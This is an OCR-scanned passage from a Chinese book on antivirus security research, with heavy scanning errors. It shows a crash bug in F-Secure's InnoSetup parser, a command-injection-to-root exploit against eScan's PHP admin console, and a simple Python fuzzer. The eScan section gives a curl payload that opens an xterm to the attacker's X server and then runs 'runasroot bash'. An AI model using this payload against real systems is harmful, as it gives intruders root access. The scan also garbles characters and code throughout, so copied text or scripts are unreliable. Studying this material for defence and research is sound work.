以 传递 -1 给 malloc ， 在 32 位 应 用 中 可 以 转化 为 0xFFFFFFFF ，64 位 应 用 中 转化 为 
OxFFFFFFFFFFFFFFFF ,这 样 在 32 位 系统 中 就 会 分 配 4GB 内 存 , 在 64 位 系统 平台 中 会 分 配 16 EiB。 
显然 这 样 会 造成 函数 执行 过 程 中 的 异常 , 因为 上 述 内 存 大 小 是 系统 可 以 处 理 的 最 大 内 存 范围 。 我 
们 可 以 传递 0 值 过 去 ， 这 样 会 返回 一 个 合法 的 指针 ,但 向 分 配 的 内 存 空间 中 写 入 信息 的 操作 会 破 
坏 堆 元 数据 或 之 前 分 配 的 其 他 内 存 区 块 。 

第 二 处 则 更 容易 发 现 : malloc 调 用 后 没有 校 验 其 是 否 执行 成 功 。 因 此 ， 如 果 传 递 一 个 非法 
值 (如 -1 ) 给 malloc， 会 造成 malloc 函 数 崩 江 ( 返回 一 个 空 指针 )。 接 着 ，FMA11oc 会 继续 调 
用 memset 来 清除 新 分 配 的 内 存 指针 。 这样, 整个 函数 调用 过 程 相当 于 执行 了 memset (nullptr, 
0x00，size_t (-1))， 这 样 就 会 导致 一 个 访问 冲突 异常 (access violation exception ) 或 段 错误 
( segmentation fault )。 

这 样 我 们 已 经 在 F-Secure 的 libfm.so 库 中 发 现 了 第 一 个 缺陷 。 接 下 来 我 们 要 做 什么 呢 ? 我 们 需 
要 确定 是 否 有 未 经 过 滤 的 可 被 用 户 控制 的 输入 值 传递 给 了 FMA1l1loc 函 数 。 当 相关 模块 读 取 解 析 某 
些 格式 的 文件 时 , 会 将 读 取 文 件 的 相关 大 小 区 块 作为 传人 值 ,然后 不 经 校 验 传递 给 FMAl11loc 函 数 。 
一 般 来 说 ， 从 某 格 式 文件 中 读 取 并 用 于 通过 FMaAlloc 函 数 分 配 内 存 的 大 小 区 块 常常 可 能 会 出 问 
题 。 交 互 调用 FMAl1loc 的 函数 中 的 InnoDecoder: :IsInnoNew 就 是 一 个 非常 好 的 例子 。 该 函数 
初始 化 内 部 结构 后 ， 会 尝试 读 取 一 个 InnoSetup 压 缩 的 可 执行 文件 的 DOS 头 、PE 头 、InnoSetup 头 
等 其 他 文件 头 。 经 过 这 样 的 函数 调用 步骤 后 ， 我 们 会 得 到 以 下 代码 : 






































.text:F72E5743 jz short loc F72E57B1 
.text:F72E5745 sub esp, OCh 

.text:F72E5748 push [ebp+n] 让 
.text:F72E574E call . Z27FMAl10cj ; FMAlloc (uint) 


.text:F72E5753 add esp, 10h 
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.text:F72E5756 test eax, eax 

.text:F72E5758 mov [ebp«s], eax 

.text:F72E575E jz short loc F72E57B1 

.text:F72E5760 push ecx 

.text:F72E5761 push [ebp+n] > 

.text:F72E5767 push 0 7E 

.text:F72E5769 push eax ; 6 

.text:F72E576A call _memset 

.text:F72E576F add esp, 10h 

上 述 代码 调用 了 FMaAlloc, 并 向 其 传递 参数 n。 我 们 会 发 现 参 数 n 的 值 是 直接 从 文件 缓冲 区 读 
取 的 ， 所 以 我 们 只 要 设置 传 入 文件 中 对 应 区 块 的 32 位 无 符号 值 为 0xFFFFFFFF ( -1 )， 就 可 以 触 








发 刚刚 提 到 的 F-Secure 的 漏洞 。 要 在 真实 情况 下 复 现 这 个 漏洞 ,需要 创建 (或 下 载 ) 一 个 InnoSetup， 
并 修改 相应 区 块 的 值 为 0xFFFFFFFF。 当 存在 漏洞 的 旧版 本 F-Secure Anti-Virus 扫 描 到 这 个 文件 的 
时 候 ， 就 会 因为 空 指针 写 和 漏洞 崩溃 。 

这 样 我 们 就 在 F-Secure 的 InnoSetup 安 装 文件 分 析 器 的 代码 中 发 现 了 一 个 很 基础 的 远程 拒绝 
服务 漏洞 。 这 个 漏洞 是 由 一 个 存在 缺陷 的 malloc 封 装 函 数 造 成 的 。InnoDecoder: :IsInnoNew 
只 是 存在 漏洞 的 函数 之 一 。 其 实 还 有 很 多 存在 漏洞 的 函数 ， 比 如 LoadNextTarFilesCchunk, 但 
是 目前 这 些 函数 中 存在 的 漏洞 已 经 被 修复 。 大 家 可 以 验证 一 下 ， 权 当 作 练 习 。 


12.1.2 “远程 服务 


不 仅仅 是 汇编 代码 ,静态 分 析 还 可 以 用 来 分 析 其 他 源 代码 。 比 如 ， 本 节 就 会 介绍 通过 静态 分 
析 Web 管 理应 用 的 PHP 源 代码 ， 控 掘 出 eScan Antivirus Linux 版 的 漏洞 。 我 大 概 花 了 一 个 小 时 的 时 
间 研 究 eScan Antivirus 的 模块 并 发 现 了 该 漏洞 。eScan Antivirus Linux 版 包含 以 下 模块 : 
口 同时 使 用 了 Bitdefender 和 ClamAvV 引 擎 的 多 引擎 扫描 器 ; 
O HTTP 服务 需 〈 通 过 Apache 实 现 ); 
OQ 用 于 管理 配置 的 PHP 应 用 ; 
口 一 系列 本 机 ELF 文 件 。 

这 些 模块 必须 使 用 正确 的 DEB 包 (针对 Ubuntu 或 其 他 基于 Debian Linux 系 统 ) 分 开 安 装 。 该 
产品 存在 漏洞 的 版 本 如 下 : 
口 escan-5.5-2.Ubuntu.12.04 x86 64.deb; 
O mwadmin-5.5-2.Ubuntu.12.04. x86 64.deb; 
口 mwav-5.5-2.Ubuntu.12.04 x86 64.deb, 

由 于 是 通过 项 态 分 析 手 段 挖 掘 漏洞 ， 理 论 上 我 们 并 不 需要 进行 安装 操作 。 我 们 只 需要 解压 这 
些 文件 ， 然 后 分 析 PHP 源 代码 。 但 是 ,为 了 测试 可 疑 漏 洞 ， 我 们 还 是 需要 部 署 并 运行 产品 ， 所 以 
还 是 需要 进行 安装 的 。 

在 基于 Debian 的 分 支 Linux 系 统 上 ， 安 装 eScan DEB 的 指令 是 $ dpkg -i *.deb. 

安装 完成 以 后 ， 一 些 列 目录 、 程 序 等 文件 被 释放 到 了 /opVMicroWorld 目 录 下 ， 如 下 图 所 示 : 


$ ls /opt/MicroWorld/ 
bin etc lib sbin usr var 
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本 地 应 用 查找 SUID/SGID 文 件 的 过 程 中 很 容易 发 生 问题 ( 详情 请 参见 第 10 章 )。 但 是 ， 在 我 
们 现在 研究 的 这 个 案例 中 ,虽然 看 起 来 风 马 牛 不 相 及 ,但 是 出 于 某 种 原因 还 是 需要 检查 
SUID/SGID 文 件 ， 其 原因 会 在 稍 后 详细 解释 。 在 Linux 和 Unix 系 统 平台 上 查找 SUID 文 件 ， 需 要 使 
用 以 下 指令 : 


$ find . -perm +4000 
/opt/MicroWorld/sbin/runasroot 


上 述 指令 执行 结果 显示 ，runasroot 是 SUID 程 序 。 通 过 观察 文件 名 ， 可 以 很 轻松 地 理解 程 
序 的 运行 效果 : 将 传递 给 程序 的 命令 以 root 权 限 执行 。 但是， 不 是 所 有 用 户 都 可 以 执行 该 程序 ， 
只 有 root 和 mwconf (安装 过 程 中 创建 的 用 户 ) 才 有 相关 权限 。PHP Web 应 用 的 执行 环境 是 当前 
安装 并 以 mwconf 用 户 身份 执行 的 Web 服 务 器 。 这 就 意味 着 , 如果 我 们 恰巧 在 该 PHP Web 应 用 中 发 
现 了 一 个 远程 代码 执行 漏洞 ， 就 可 以 使 用 root 权 限 执行 任意 命令 ， 因 为 mwconf 用 户 有 权限 执行 
SUID 应 用 runasroot。 这 也 意味 着 如 果 我 们 发 现 了 这 样 的 一 个 漏洞 ， 其 危害 将 会 十 分 巨大 。 

让 我 们 首先 查看 安装 在 /opt/MicroWorld/var/www/htdocs/index.php 目 录 下 的 PHP 应 用 程序 : 
































$ find /opt -name "*.php" 
/opt/MicroWorld/var/www/ 
/opt/MicroWorld/var/www/ 
/opt/MicroWorld/var/www/ 
/opt/MicroWorld/var/www/ 
/opt/MicroWorld/var/www/ 
/opt/MicroWorld/var/www/ 
/opt/MicroWorld/var/www/ 
/opt/MicroWorld/var/www/ 
/opt/MicroWorld/var/www/ 
/opt/MicroWorld/var/www/ 
/opt/MicroWorld/var/www/ 
/opt/MicroWorld/var/www/ 
/opt/MicroWorld/var/www/ 
/opt/MicroWorld/var/www/ 
/opt/MicroWorld/var/www/ 
/opt/MicroWorld/var/www/ 
/opt/MicroWorld/var/www/ 
/opt/MicroWorld/var/www/ 
/opt/MicroWorld/var/www/ 
/opt/MicroWorld/var/www/ 
/opt/MicroWorld/var/www/ 
/opt/MicroWorld/var/www/ 
/opt/MicroWorld/var/www/ 
/opt/MicroWorld/var/www/ 
/opt/MicroWorld/var/www/ 
/opt/MicroWorld/var/www/ 
/opt/MicroWorld/var/www/ 
/opt/MicroWorld/var/www/ 


EEES. 
需要 注意 的 是 这 里 有 大 量 的 PHP 文 件 。 如 果 我 们 打开 文件 index.php( 服务 器 解析 提供 的 第 一 
个 页 面 ), 会 发 现 没 有 什么 特别 令 人 兴奋 的 东西 ,但 是 , 在 index.php 中 很 多 地 方 都 调用 了 login.php。 


tdocs/index.php 
tdocs/preference.php 
tdocs/online.php 
tdocs/createadmin.php 
tdocs/leftmenu.php 

tdocs/help contact.php 
tdocs/forgotpassword.php 
tdocs/logout.php 
tdocs/mwav/index.php 
tdocs/mwav/crontab.php 
tdocs/mwav/action.php 
tdocs/mwav/selections.php 
tdocs/mwav/savevals.php 
tdocs/mwav/status Updatelog.php 
tdocs/mwav/header.php 
tdocs/mwav/readvals.php 
tdocs/mwav/manage admins.php 
tdocs/mwav/logout.php 
tdocs/mwav/AV vdefupdates.php 
tdocs/mwav/login.php 
tdocs/mwav/main.php 
tdocs/mwav/crontab mwav.php 
tdocs/mwav/main functions.php 
tdocs/mwav/update.php 
tdocs/mwav/status AVfilterlog.php 
tdocs/mwav/topbar.php 
tdocs/common functions.php 
tdocs/login.php 
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«form method-"post" action-"login.php"- 


«table class-"tabledata" width-"400" align="center" 
cellspacing-"'5"-» 


(scs 

让 我 们 打开 login.php， 研究 一 下 其 中 的 身份 验证 逻辑 是 怎样 的 。 也 许 我 们 可 以 找到 一 些 绕 过 
验证 的 方式 。login.php 会 首先 校 验 使 用 的 cGI REQUEST_METHOD 是 否 不 是 GET 方法 ( 即 与 PosT 
方法 相对 的 另 一 种 请 求 方法 ): 

(...) 

<?php 


include("common functions.php"); 
// code for detection of javascript and cookie support in client browser 


























if(strpos($ SERVER["REQUEST METHOD"],"GET") !-- false ) 
{ 
header("Location: index.php"); 
exit(); 
} 
( ) 


接着 ， 程 序 会 校 验 进行 的 操作 是 否 和 预期 行为 一 致 。 这 里 值得 一 提 的 是 srunasroot 的 调用 
方式 : 


ius) 
$passwdFile-"/opt/MicroWorld/etc/passwd"; 
$product-trim($ POST['product name']); 
Susername-trim($ POST['uname']); 

$passwd = trim($ POST["pass"]); 

Slanguage = $ POST["language"]; 

$conffile = "/opt/MicroWorld/etc/auth.conf"; 
Sauth, conf - false; 

if(file exists($conffile)) 





Upgrade Old Auth Conf ($conffile); 
S$auth conf = MW readConf(S$conffile, "4$", '', '"'); 





else 


Sauth conf - array(); 
S$auth conf['auth']['type'] = 0; 
exec("S$runasroot /bin/touch S$conffile"); 
exec("$runasroot /bin/chown mwconf:mwconf $conffile"); 
MW writeConf (S$auth, conf,$conffile,"",'"'); 

} 

( ) 


PHP 脚 本 从 请 求 中 读 取 相关 参数 值 ( uname 代 表 用 户 名 ，pass 代 表 密 码 )， 更 有 意思 的 是 ， 
还 有 一 些 变量 调用 了 exec ($runasroot) 。 但 是 此 处 的 sconffile 在 PHP 源 代码 中 被 写 死 ， 所 
以 此 处 我 们 无 法 深入 利用 。 那 别 的 调用 了 exec (srunastroot ) 地方 呢 ? 如 果 我 们 继续 分 析 该 PHP 
文件 ， 就 会 发 现 一 处 可 疑 的 PHP 代 码 : 
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但 是 ， 在 本 例 中 ,程序 忘记 过 滤 


(es) 

$retval = check user($username, "NULL", $passwdFile, "NULL"); 

list($k,$v)zexplode("-",$retval); 

if($v I= 0 ) 

{ 
header("Location: index.php?err msg-usernotexists"); 
exit(); 

j 

elseif( strlen($passwd)«5 ) 

{ 
header("Location: index.php?err msg-password len"); 
exit(); 

} 

elseif( preg match("/[|&) (!12«NV'NV"^ ]/", $passwd) ) 

{ 
header("Location: index.php?err msg=password_chars"); 
exit(); 

} 

else 

{ 
$retval-check user ($username, $passwd, $spasswdFile, "USERS"); 
list($k,$v)zexplode("-",$retval); 
if($v == 0) 
( 


$retval-check user ($username,S$passwd,$passwdFile,$product); 


list($k,$v)zexplode("-",$retval); 
if($v == O0) 
( ) 


注意 到 调用 preg_match 的 地 方 了 吗 ? 此 处 使 用 preg_match 来 查找 以 下 字符 和 空格 
[1&) (1!1><'"。 我 们 大 概 可 以 推测 出 ， 此 处 是 在 针对 基于 shell escape 的 
了 不 止 一 个 重要 的 字符 : 分 号 ( ; )。 让 我 们 跟 进 PHP 脚 本， 找 出 
从 客户 端 发 送 的 参数 $spasswd 是 否 被 使 用 并 用 于 执行 某 些 系统 命令 。 最 终 我 们 发 现 ， 如 果 
preg_match 校 验 通 过 的 话 , 会 调用 函数 check_user。 如 果 我 们 全 局 搜索 chneck_user, 会 发 现 
它 是 在 common _functions.php 中 被 定义 执行 的 。 如 果 我 们 打开 common_functions.php， 然后 转 至 实 
现 check_user 困 数 的 几 行 ， 会 发 现 如 下 结 











feces) 
function check user($uname, $password, $passfile, $product) 
{ 

// 二 进 制 文件 的 名 称 和 路 径 

$prog = "/opt/MicroWorld/sbin/checkpass"; 

$runasroot - "/opt/MicroWorld/sbin/runasroot"; 

unset ($output) ; 

unset ($ret); 

// passwd 文 件 的 名 称 和 路 径 

$out- exec("$runasroot $prog $uname $password $passfile 
$product",$output,$ret); 

$val = $output[0]."-".$ret; 

return $val; 


}(...) 


典型 


ANLE 


P I 


sets 


命令 注入 进行 过 滤 。 
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太 棒 了 ! 用 户 可 以 控制 的 passwora 字 段 被 拼接 ， 并 通过 允许 使 用 shell 转 义 字 符 的 PHP 卫 数 
exec () 执行， 这 样 一 来 ， 就 有 可 能 执行 任意 系统 命令 了 。 然 而 ， 由 于 在 命令 中 分 号 字符 〈; ) 作 
为 分 隔 符 使 用 ， 接 下 来 的 命令 不 属于 SUID 二 进 制 文件 runasroot ， 而 属于 shell 本 身 ， 命 令 会 以 
Web 应 用 用 户 mwconf 吴 份 执行 。 不 过 ， 就 像 之 前 提 到 的 那样 ,用户 mwconf 也 人 允许 执行 SUID 可 执 
行程 序 runasroot。 因 此 ， 我 们 可 以 注入 一 个 命令 ， 但 无 法 直接 以 root 身 份 运行 命令 。 

还 有 一 个 问题 等 待 我 们 解决 : 空格 字符 被 过 滤 了 。 这 就 意味 着 我 们 无 法 构造 使 用 长 命令 , 因 
为 空格 被 过 滤 了 。 那么 这 是 否 意味 着 我 们 只 能 运行 单条 命令 ? 事实 并 非 如 此 ,因为 我 们 可 以 使 用 
一 个 老 把 戏 : 执行 命令 xterm 或 运行 其 他 X11 GUI 应 用 使 其 反弹 一 个 shell。 但 是 由 于 我 们 无 法 使 
用 空格 , 需要 使 用 分 号 分 隔 并 注 和 人 多 个 命令 。 此 外 , 还 有 一 个 地 方 需要 注意 : 在 执行 命令 前 , PHP 
脚本 会 校 验 用 户 名 是 否 合法 。 这 对 我 们 来 说 不 是 一 个 好 消息 ,因为 这 给 我 们 的 漏洞 利用 带 来 了 限 
制 , 我 们 需要 起 码 知道 一 个 合法 的 用 户 名 。 但 是 , 假设 我 们 已 经 知道 了 一 个 合法 用 户 名 ( 其 实在 
很 多 情况 下 ， 并 不 难 猜测 出 合法 的 用 户 名 )。 下 面 是 漏洞 利用 的 具体 方式 : 

$ curl -data ^ 


"product-l1&uname-validGuser.com&pass-;DISPLAY-YOURIP:0;xterm;" \ 
http://target:10080/10gin.php 


当 我 们 运行 上 述 指令 后 , 存在 漏洞 的 机 器 会 尝试 链接 到 攻击 者 的 搭建 的 X11 服 务 器 上 。 接 着， 
我 们 就 可 以 通过 xterm 执 行 以 下 指令 ， 获 取 root 权 限 : 

$ /opt/MicroWorld/sbin/runasroot bash 

这 样 就 大 功 告 成 了 ， 现 在 我 们 获取 了 存在 漏洞 的 机 器 的 root 权 限 。 仅 通过 项 态 分 析 ， 我 们 就 
发 现 了 该 漏洞 。 在 不 知道 内 部 实现 原理 的 情况 下 ,通过 动态 分 析 ， 可 能 无 法 或 者 说 无 法 很 容易 地 
挖掘 到 该 漏洞 。 其 实 ， 不同 的 技术 可 以 挖掘 到 不 同 的 漏洞 。 
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静态 分 析 是 不 依赖 于 执行 代码 开展 的 分 析 方 式 。 通 常会 涉及 通过 阅读 软件 的 源 代码 , 查找 可 
用 的 安全 漏洞 并 加 以 利用 。 如 果 目 标 是 一 款 闭 源 软件 ， 就 需要 进行 二 进 制 逆向 分 析 。 进 行 此 类 道 
向 分 析 的 时 候 ， 我 们 通常 需要 使 用 IDA。 借 助 IDA 的 FLIRT 技 术 ， 我 们 可 以 节省 下 道 向 分 析 编 译 
成 二 进 制 文件 的 函数 库 的 时 间 。 这 是 因为 FLIRT 帮 我 们 完成 了 自动 识别 ， 让 我 们 能 够 致力 于 道 向 
工程 中 比较 有 意思 的 部 分 。 

此 外 本 章 还 通过 两 个 例子 介绍 了 ， 如 何 静 态 分 析 源 代码 以 及 使 用 IDA 反 汇编 一 球 闭 源 的 软 
件 。 通 过 逆向 分 析 一 个 未 公开 的 旧版 本 的 F-Secure Anti-Virus Linux 版 的 文件 格式 解析 器 的 漏洞 ， 
我 们 发 现 了 可 以 远程 利用 该 漏洞 的 方式 。 类 似 地 , 我 们 通过 阅读 PHP 源 代码 , 发 现 并 证 实 了 eScan 
antivirus Linux 版 管理 控制 台 的 远程 命令 注入 以 及 权限 提升 漏洞 。 

当然 , 静态 分 析 也 有 其 局 限 , 尤其 是 当 逆 向 分 析 闭 源 软件 或 软件 源 代码 十 分 庞大 时 ,分 析 查 
找 漏洞 会 十 分 耗 时 。 下 一 章 将 曾 释 动态 分 析 技 巧 。 动态 分 析 通 过 分 析 程 序 在 运行 时 的 行为 ,查找 
安全 漏洞 。 
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与 静态 分 析 技术 仅 分 析 程 序 源 代码 或 目标 程序 的 反 汇 编 结果 不 同 , 动态 分 析 技 术 通过 运行 程 
序 来 提取 基于 程序 应 用 行为 的 相关 分 析 信 息 。 

动态 分 析 技术 通过 在 计算 机 软件 或 硬件 上 的 真实 或 虚拟 的 运行 环境 中 运行 程序 , 从 中 提取 行 
为 信息 。 有 很 多 种 不 同 的 动态 分 析 技术 可 以 使 用 。 本 章 将 会 重点 探讨 两 项 技术 : 模糊 测试 和 代码 
履 盖 测试 。 接 下 来 的 几 节 对 这 两 种 技术 均 有 所 涉及 ， 并 将 重点 探讨 模糊 测试 。 


13.1 模糊 测试 


模糊 测试 是 一 项 动态 分 析 技术 , 通过 向 测试 目标 程序 传人 异常 或 畸形 的 数据 , 来 让 程序 崩溃 
并 从 中 发 现 缺陷 和 有 意思 的 潜在 漏洞 。 由 于 比较 容易 实现 , 模糊 测试 大 概 是 挖掘 程序 缺陷 最 常见 
的 手段 : 即使 是 最 基本 的 模糊 测试 工具 也 可 以 挖掘 出 漏洞 。 我 们 可 以 很 容易 地 进行 简单 的 模糊 测 
试 。 但 是 ,要 正确 地 进行 模糊 测试 却 没有 那么 容易 。 接 下 来 将 会 探讨 可 以 挖掘 出 漏洞 的 简单 模糊 























测 斌 工具。 当然， 也 会 探讨 更 加 复杂 的 模糊 测试 工具 , 使 用 代码 覆盖 测试 来 增强 此 类 模糊 测试 工 
具 或 框架 的 能 力 。 





13.1.1 模糊 测试 工具 是 什么 


每 当 有 人 问 我 使 用 什么 模糊 测试 工具 ( fuzzer ) 的 时 候 ， 我 都 会 反问 他 们 :“ 你 们 理解 的 模糊 
测试 工具 是 什么 ? "对 一 些 人 来 说 ， 模 糊 测试 工具 只 是 一 个 简单 的 畸形 样本 生成 工具 一 一 接收 传 
入 数据 , 并 根据 传人 的 模糊 测试 模版 生成 不 同 的 畸形 数据 。 对 另 一 些 人 来 讲 ， 一 款 模糊 测试 工具 
不 仅仅 用 于 生成 畸形 文件 , 还 会 使 用 需要 测试 的 目标 程序 来 运行 解析 生成 的 畸形 样本 文件 。 还 有 
一 些 人 将 模糊 测试 工具 看 作 一 个 综合 的 测试 框架 , 可 以 用 来 实现 其 他 用 途 ， 而 不 只 是 生成 畸形 文 
件 并 使 用 目标 程序 运行 这 些 样本 文件 。 在 我 来 看 , 我 更 倾向 于 最 后 一 种 观点 : 它 是 一 个 完整 的 模 
糊 测 试 框架 ， 可 以 帮助 我 们 针对 目标 程序 开展 动态 分 析 。 此 类 模糊 测试 框架 ,应 该 有 以 下 模块 。 
口 畸形 文件 生成 工具 ”基于 特定 算法 对 某 一 段 字 广 序列 (模糊 测试 模版 )、 某 一 格式 文件 或 
协议 规范 随机 变化 。 

口 调试 工具 ”用 于 捕获 测试 目标 程序 的 异常 和 错误 的 库 或 程序 。 对 于 基础 模糊 测试 工具 来 
说 ， 本 部 分 功能 属于 可 选 的 。 
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对 于 更 加 复杂 的 模糊 测试 框架 来 说 ， 还 需要 以 下 更 多 模块 : 
口 缺陷 复 现 工具 ; 

口 月 溃 管理 ; 

口 月 溃 自动 分 析 工 具 ; 

口 PoC 精 简 工 具 ; 











在 上 面 列 表 中 的 最 后 一 行 , 我 有 意 留 了 空白 位 置 ， 因 为 针对 目标 程序 或 生成 的 PoC 和 崩 演 还 
可 以 开展 很 多 不 同形 式 的 分 析 ( 比如 ， 不 仅仅 局 限于 捕获 月 演 的 监控 技术 )。 接 下 来 的 几 节 将 会 
演示 不 借助 调试 模块 或 其 他 监控 等 待 程序 于 省 的 模块 , 使 用 简单 的 随机 畸形 生成 算法 进行 模糊 测 
试 。 之 后 ， 将 会 探讨 更 完整 的 模糊 测试 方案 。 


13.1.2 ”简单 的 模糊 测试 


一 个 简单 而 有 效 的 模糊 测试 工具 可 以 通过 基础 畸形 生成 算法 实现 。 比 如 , 如 果 要 对 反 病 毒 软 
件 开 展 模糊 测试 ， 我 们 按照 以 下 步骤 创建 一 个 简单 的 Python 脚本 。 

(1) 选取 一 个 或 多 个 文件 作为 传人 样本 。 

(2) 针对 传人 文件 内 容 进行 随机 蝴 形 变更 。 

(3) 将 新 生成 文件 写 和 人 一 个 目录 。 

(4) 使 用 反 病 毒 软 件 自 定义 扫描 存储 畸形 样本 文件 的 目录 ， 直 到 反 病 毒 软 件 骨 省 为 止 。 

类 似 这 样 的 Python 脚本 十 分 容易 编写 。 在 第 一 次 试验 中 , 我 们 先 来 编写 一 个 简单 的 通用 模糊 
测试 工具 ， 并 针对 Bitdefender Linux 版 本 进行 模糊 测试 。 也 就 是 说 ， 脚 本 将 是 通用 的 ， 可 以 轻松 
支持 运行 在 Windows、Linux 或 Mac OS X 平 台 上 的 其 他 反 病 毒 软件 ， 以 及 目标 反 病 毒 产 品 和 系统 
平台 上 的 命令 行 扫描 器 。 

该 基础 模糊 测试 攻击 的 完整 代码 如 下 : 


$ cat simple av fuzzer.py 
d$1/usr/bin/python 

















import os 
import sys 
import random 





from hashlib import md5 


class CBasicFuzzer: 
def _ init (self, file in, folder out, cmd): 
" Set the directories and the OS command to run after mutating. 


self.folder out - folder, out 
Self.file in - file in 
self.cmd - cmd 


184 第 13 章 动态 分 析 





def mutate(self, buf): 
tmp - bytearray (buf) 
# Calculate the total number of changes to made to the buffer 
total changes - random.randint(1, len(tmp)) 
for i in range(total changes): 
# Select a random position in the file 
pos - random.randint(0, len(tmp)-1) 
# Select a random character to replace 
char = chr(random.randint (0, 255)) 
# Finally, replace the content at the selected position with the 
# new randomly selected character 
tmp[pos] = char 


return str(tmp) 


def fuzz(self): 
orig buf - open(self.file in, "rb").read() 


# Create 255 mutations of the input file 
for i in range(255): 
buf - self.mutate(orig buf) 


md5 hash md5 (buf).hexdigest() 
print "[«] Writing mutated file $s" $ repr (md5 hash) 
filename os.path.join(self.folder out, md5 hash) 


] 
with open(filename, "wb") as f: 
f.write(buf) 


# Run the operating system command to scan the directory with the av 
cmd - "$s $s" $ (self.cmd, self.folder out) 
nc uad band) 


# mu E ue uu a Se a a E E a E a e E e E A Es ML A 
def usage(): 
print "Usage:", sys.argv[0], "«filename» «output directory» " + \ 
"c«av Scan command-»" 
# Cic repa c E S E ES eT Ix pc a S E E a E ne a EE DII Im mp 


def main(file_in, folder_out, cmd): 
fuzzer = CBasicFuzzer(file in, folder out, cmd) 
fuzzer.fuzz() 


d name z= 9 malu Us 





if len(sys.argv) !- 4: 
usage() 
else: 
main(sys.argv[1], svs.argv[2], svs.argv[3]) 


这 个 十 分 基础 的 模糊 测试 脚本 ,创建 了 一 个 仅 带 有 三 个 方法 的 cBasicFuzzer 类 : TJ 
dr i . init  ). mutate 和 fuzz。mutate 方 法 接收 一 个 传人 的 字符 串 ， 接 着 在 随机 位 置 
使 用 随机 字符 ， 将 字 节 序列 蔡 换 成 随机 数量 的 其 他 字 节 。 fuzz 方 法 会 读 取 一 个 文件 (一 般 来 说 
是 模糊 测试 模版 ), 然后 对 读 取 的 缓冲 区 内 容 进 行 变形 ， 接 着 生成 的 新 的 畸变 文件 ( 使 用 计算 得 
出 的 畸变 字 节 序列 的 MD5 值 作为 文件 名 )。 ee 最 终 ， 创 建 完成 255 
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个 畸变 样本 后 ， 脚 本 会 使 用 操作 系统 命令 调用 反 病 毒 软件 来 扫描 对 应 目录 。 简 而 言 之 ,该 模糊 
测试 脚本 创建 了 255 个 畸变 样本 文件 , 并 将 它们 存 人 同一 个 目录 中 , 最 后 调用 反 病 毒 软 件 扫描 对 
应 文件 夹 。 

在 下 面 的 例子 中 , 模糊 测试 工具 会 生成 255 个 随机 ELF 文 件 /bim/ls 的 畸变 文件 到 out 目 录 , 接着 
使 用 bascan 命 令 让 Bitdefender Linux 版 来 扫描 该 日 录 : 


$ python ../simple av fuzzer.py /bin/ls out/ bdscan 

[+] Writing mutated file '27a0f£868f6a6509e30c7420ee69a0509' 
[+] Writing mutated file '9d4aa7877544ef0d7c21ee9bb2b9fD17' 
[+] Writing mutated file '12055e91898d26058119126f2196149573' 
(...252 more files skipped...) 

BitDefender Antivirus Scanner for Unices v7.90123 Linux-i586 
Copyright (C) 1996-2009 BitDefender. All rights reserved. 
This program is licensed for home or personal use only. 
Usage in an office or production environment represents 

a violation of the license terms 














Infected file action: ignore 
Suspected file action: ignore 
Loading plugins, please wait 
Plugins loaded. 


/home/joxean/examples/tahh/chapter18/tests/out/ 
5b69e85ab0443852bbfc60e2ea02a0121 ok 
/home/joxean/examples/tahh/chapter18/tests/out/ 
a24f5283fa0ae709269724d715b7773d ok 
/home/joxean/examples/tahh/chapter18/tests/out/ 
dc153336cà7125bcd94d89d67cd3e44b ok 

ass) 


尽管 使 用 的 模糊 测试 的 方式 十 分 基础 , 但 确实 有 效 。 模糊 测试 结果 很 大 程度 上 取决 于 测试 目 
标 软件 的 质量 ( 比如 ， 测 试 的 反 病 毒 产 品 中 是 否 存 在 缺陷 ) 以 及 传人 样本 的 质量 。 


13.1.3 ”对 反 病 毒 产品 的 自动 化 模糊 测试 


在 之 前 的 部 分 中 , 我 们 创建 了 一 个 基础 的 模糊 测试 脚本 。 该 脚本 对 于 某 些 场景 确实 有 效 , 但 
是 如 果 测 试 程序 崩溃 的 话 ， 还 有 一 些 重要 的 问题 吸 待 回答 : 程序 是 如 何 骨 溃 的 ? 是 在 哪里 崩 演 
的 ? 为 什么 会 崩溃 ?如果 程序 扫描 分 析 第 一 个 文件 的 时 候 就 朋 溃 , 就 将 无 法 继续 分 析 接 下 来 的 文 
ft; 在 这 种 情况 下 ,我 们 又 该 做 些 什么 呢 ? 借助 这 样 一 个 简单 的 模糊 测试 方式 ,我 们 又 该 如 何 找 
出 到 底 是 哪 一 个 文件 导致 反 病 毒 扫描 器 最 终 骨 省 的 ?又 该 如 何 继续 分 析 其 他 文件 ? 

以 上 问题 的 答案 几乎 是 一 致 的 : 借助 自动 化 调试 手段 。 和 上 一 节 一 样 ， 实 现 一 个 基本 的 模糊 
测试 工具 十 分 简单 。 但 是 要 编写 一 个 模糊 测试 工具 ， 使 其 能 够 捕获 、 管 理 前 省 信息 ， 将 PoC 移 动 
到 其 他 目录 , 使 反 病 毒 软件 能 够 继续 扫描 剩余 的 其 他 文件 ， 这 个 过 程 就 会 复杂 得 多 。 因 此 ,可 以 
根据 不 同 的 复杂 度 来 实现 模糊 测试 : 可 以 简单 到 编写 大 概 只 有 五 行 的 Shell 脚 本 实现 , 也 可 以 复杂 
到 借助 能 进行 自动 化 调试 、 代 码 覆 盖 测 试 和 语义 提取 的 模糊 测试 框架 。 
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1. 使 用 命令 行 工具 

要 解决 前 面部 分 中 提出 的 有 关 自 动 化 的 问题 , 最 简单 的 手段 就 是 使 用 命令 行 工 具 , 最 起 码 在 
Unix 操 作 系 统 平 台 上 这 样 的 解决 方案 有 效 。 比 如 , 我 们 可 以 通过 在 运行 反 病 毒 扫 描 器 之 前 ,运行 
ulimit -c unlimitegd 命 令 来 获取 崩 淡 信息 。 这 样 一 来 一旦 对 应 的 进程 衣 演 了 ， 操 作 系 统 就 
在 磁盘 上 生成 一 个 core dump 文 件 。 此 外 ， 如 果 要 知道 哪个 文件 会 造成 反 病毒 软件 前 泪 ， 为 何不 
使 用 反 病 毒 扫 描 器 逐一 对 目录 下 的 文件 进行 扫描 测试 呢 ? 

本 节 将 会 探讨 如 何 修改 先前 编写 并 使 用 的 Python 模糊 测试 脚本 。 值 得 一 提 的 是 ,我 们 在 这 里 
探讨 的 手段 仍 是 一 个 和 雏形。 以 下 是 详细 的 步骤 。 

(1) 在 运行 反 病 毒 扫 摘 器 之 前 ， 先 运行 ulimit -c unlimited 命 令 。 

(2) 使 用 反 病 毒 扫 描 器 逐一 扫描 目录 下 的 样本 文件 。 

(3) 如 果 生 成 了 core dump 文 件 ， 将 它们 随 PoC 一 起 移动 到 其 他 目录 中 去 。 

